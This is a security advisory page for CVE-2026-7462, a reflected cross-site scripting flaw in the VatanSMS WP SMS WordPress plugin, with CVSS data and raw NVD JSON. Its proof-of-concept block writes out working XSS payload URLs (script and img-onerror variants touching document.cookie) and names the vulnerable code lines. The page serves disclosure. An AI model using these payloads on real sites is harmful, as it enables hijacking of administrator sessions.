Security Vulnerability Report
中文
CVE-2026-7462 CVSS 6.1 MEDIUM

CVE-2026-7462

Published: 2026-05-20 02:16:39
Last Modified: 2026-05-20 13:54:55

Description

The VatanSMS WP SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `page` parameter in all versions up to, and including, 1.01. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

VatanSMS WP SMS <= 1.01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Proof of Concept for CVE-2026-7462 // The vulnerability is triggered via the 'page' parameter in the VatanSMS WP SMS plugin. // Attackers can inject arbitrary JavaScript payloads. // Example malicious URL: // http://target-wordpress-site/wp-admin/admin.php?page=<script>alert(document.cookie)</script> // Alternative payload using img tag (useful if script tags are filtered): // http://target-wordpress-site/wp-admin/admin.php?page=<img src=x onerror=alert('XSS')> // Vulnerable code locations (references): // - includes/admin/groups/groups.php (Line 34) // - includes/admin/outbox/outbox.php (Line 5) // - includes/admin/subscribers/subscribers.php (Line 128) // Note: This requires an administrator to click the link while logged in.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7462", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:39.260", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The VatanSMS WP SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `page` parameter in all versions up to, and including, 1.01. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/groups/groups.php#L34", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/outbox/outbox.php#L5", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/subscribers/subscribers.php#L128", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/96ef8459-1600-4ca0-93c6-0ee42f8adabd?source=cve", "source": "[email protected]"}]}}